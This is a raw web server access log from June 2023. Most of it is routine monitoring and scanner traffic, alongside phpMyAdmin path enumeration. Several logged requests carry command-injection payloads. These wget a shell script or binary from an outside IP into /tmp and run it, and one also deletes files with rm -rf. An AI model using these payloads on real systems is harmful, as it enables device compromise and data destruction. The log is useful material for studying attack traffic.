8.210.152.4 - - [07/Jun/2023:07:40:04 +0200] "GET http://212.91.246.87:80/phpma/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:40:05 +0200] "GET http://212.91.246.87:80/sqlweb/scripts/setup.php HTTP/1.0" 404 329 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:40:05 +0200] "GET http://212.91.246.87:80/webdb/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:40:06 +0200] "GET http://212.91.246.87:80/websql/scripts/setup.php HTTP/1.0" 404 329 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:40:06 +0200] "GET http://212.91.246.87:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:40:07 +0200] "GET http://212.91.246.87:80/php/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:40:08 +0200] "GET http://212.91.246.87:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 339 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:40:08 +0200] "GET http://212.91.246.87:80/db/scripts/setup.php HTTP/1.0" 404 325 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:40:09 +0200] "GET http://212.91.246.87:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:40:09 +0200] "GET http://212.91.246.87:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 335 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:40:10 +0200] "GET http://212.91.246.87:80/phpmanager/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:40:10 +0200] "GET http://212.91.246.87:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:40:11 +0200] "GET http://212.91.246.87:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:40:11 +0200] "GET http://212.91.246.87:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
212.91.246.72 - - [07/Jun/2023:07:40:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:41:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:42:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.49 - - [07/Jun/2023:07:42:46 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [07/Jun/2023:07:43:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:44:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
159.65.32.180 - - [07/Jun/2023:07:44:40 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
45.79.181.223 - - [07/Jun/2023:07:45:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.246.72 - - [07/Jun/2023:07:45:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:46:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.104.11.4 - - [07/Jun/2023:07:46:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.246.72 - - [07/Jun/2023:07:47:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:48:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.225.74.229 - - [07/Jun/2023:07:48:17 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [07/Jun/2023:07:49:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:50:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.188 - - [07/Jun/2023:07:51:03 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [07/Jun/2023:07:51:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:52:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:53:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:54:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.124 - - [07/Jun/2023:07:55:13 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [07/Jun/2023:07:55:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:56:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:57:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.145.60 - - [07/Jun/2023:07:57:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.60 - - [07/Jun/2023:07:57:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.60 - - [07/Jun/2023:07:57:41 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.145.60 - - [07/Jun/2023:07:57:41 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [07/Jun/2023:07:58:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.54 - - [07/Jun/2023:07:58:21 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [07/Jun/2023:07:59:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.138.35 - - [07/Jun/2023:07:59:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.35 - - [07/Jun/2023:07:59:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.35 - - [07/Jun/2023:07:59:22 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.35 - - [07/Jun/2023:07:59:22 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
45.128.232.62 - - [07/Jun/2023:07:59:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [07/Jun/2023:08:00:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:01:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:02:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.79.181.223 - - [07/Jun/2023:08:03:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.246.72 - - [07/Jun/2023:08:03:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:04:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:05:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.162.124 - - [07/Jun/2023:08:05:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
165.154.119.15 - - [07/Jun/2023:08:06:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.29.0"
212.91.246.72 - - [07/Jun/2023:08:06:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.154.119.15 - - [07/Jun/2023:08:06:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
109.205.213.105 - - [07/Jun/2023:08:06:38 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
159.65.32.180 - - [07/Jun/2023:08:06:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
159.65.32.180 - - [07/Jun/2023:08:06:44 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.82/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
212.91.246.72 - - [07/Jun/2023:08:07:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:08:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:09:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.205.213.117 - - [07/Jun/2023:08:09:41 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.91.246.72 - - [07/Jun/2023:08:10:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:11:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.154.134.201 - - [07/Jun/2023:08:11:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/596.44 (KHTML, like Gecko) Chrome/79.0.1791 Safari/537.36"
165.154.134.201 - - [07/Jun/2023:08:11:43 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 8_0_2; Win64; x64) AppleWebKit/587.50 (KHTML, like Gecko) Chrome/50.0.4 Safari/537.36"
165.154.134.201 - - [07/Jun/2023:08:11:43 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/598.47 (KHTML, like Gecko) Chrome/89.0.1800 Safari/537.36"
165.154.134.201 - - [07/Jun/2023:08:11:43 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/557.50 (KHTML, like Gecko) Chrome/99.0.2415 Safari/537.36"
165.154.134.201 - - [07/Jun/2023:08:11:43 +0200] "GET /axis2-admin/ HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
165.154.134.201 - - [07/Jun/2023:08:11:44 +0200] "GET /axis2/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
165.154.134.201 - - [07/Jun/2023:08:11:44 +0200] "GET /axis2/axis2-admin/ HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
51.158.37.186 - - [07/Jun/2023:08:12:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0"
51.158.37.186 - - [07/Jun/2023:08:12:01 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0"
212.91.246.72 - - [07/Jun/2023:08:12:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
187.145.4.183 - - [07/Jun/2023:08:13:03 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+95.214.27.201/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [07/Jun/2023:08:13:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:14:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:15:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:16:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:17:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:18:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:19:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.205.213.114 - - [07/Jun/2023:08:19:16 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
179.43.162.124 - - [07/Jun/2023:08:19:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [07/Jun/2023:08:20:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.128.12 - - [07/Jun/2023:08:20:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.246.72 - - [07/Jun/2023:08:21:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.216.216.100 - - [07/Jun/2023:08:21:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [07/Jun/2023:08:22:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.162.124 - - [07/Jun/2023:08:22:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [07/Jun/2023:08:23:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:24:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:25:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.128.232.62 - - [07/Jun/2023:08:25:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [07/Jun/2023:08:26:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:27:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:28:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:29:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:30:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:31:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.99.57.68 - - [07/Jun/2023:08:31:20 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0"
212.91.246.72 - - [07/Jun/2023:08:32:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.249 - - [07/Jun/2023:08:32:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.128.232.62 - - [07/Jun/2023:08:32:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [07/Jun/2023:08:33:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:34:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:35:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:36:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:37:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:38:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:39:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:40:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:41:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.87.151.102 - - [07/Jun/2023:08:42:00 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [07/Jun/2023:08:42:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:43:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:44:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.190 - - [07/Jun/2023:08:44:19 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
167.99.190.225 - - [07/Jun/2023:08:44:24 +0200] "GET /download/po HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
167.99.190.225 - - [07/Jun/2023:08:44:24 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
212.91.246.72 - - [07/Jun/2023:08:45:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.225.74.229 - - [07/Jun/2023:08:45:23 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
146.59.233.75 - - [07/Jun/2023:08:45:50 +0200] "GET http://212.91.246.85:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:50 +0200] "GET http://212.91.246.85:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:50 +0200] "GET http://212.91.246.85:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:50 +0200] "GET http://212.91.246.85:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:50 +0200] "GET http://212.91.246.85:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:50 +0200] "GET http://212.91.246.85:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:50 +0200] "GET http://212.91.246.85:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:50 +0200] "GET http://212.91.246.85:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:50 +0200] "GET http://212.91.246.85:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:50 +0200] "GET http://212.91.246.85:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:50 +0200] "GET http://212.91.246.85:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:51 +0200] "GET http://212.91.246.85:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:51 +0200] "GET http://212.91.246.85:80/pma/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:51 +0200] "GET http://212.91.246.85:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:51 +0200] "GET http://212.91.246.85:80/myadmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:51 +0200] "GET http://212.91.246.85:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:51 +0200] "GET http://212.91.246.85:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:51 +0200] "GET http://212.91.246.85:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:51 +0200] "GET http://212.91.246.85:80/SQL/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:51 +0200] "GET http://212.91.246.85:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:51 +0200] "GET http://212.91.246.85:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:51 +0200] "GET http://212.91.246.85:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:51 +0200] "GET http://212.91.246.85:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:51 +0200] "GET http://212.91.246.85:80/admin/pma/scripts/setup.php HTTP/1.0" 404 332 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:51 +0200] "GET http://212.91.246.85:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 335 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:51 +0200] "GET http://212.91.246.85:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 337 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:51 +0200] "GET http://212.91.246.85:80/webadmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:51 +0200] "GET http://212.91.246.85:80/admin/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:51 +0200] "GET http://212.91.246.85:80/dbadmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:51 +0200] "GET http://212.91.246.85:80/mysql/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:51 +0200] "GET http://212.91.246.85:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:51 +0200] "GET http://212.91.246.85:80/phpma/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:51 +0200] "GET http://212.91.246.85:80/sqlweb/scripts/setup.php HTTP/1.0" 404 329 "-" "-"
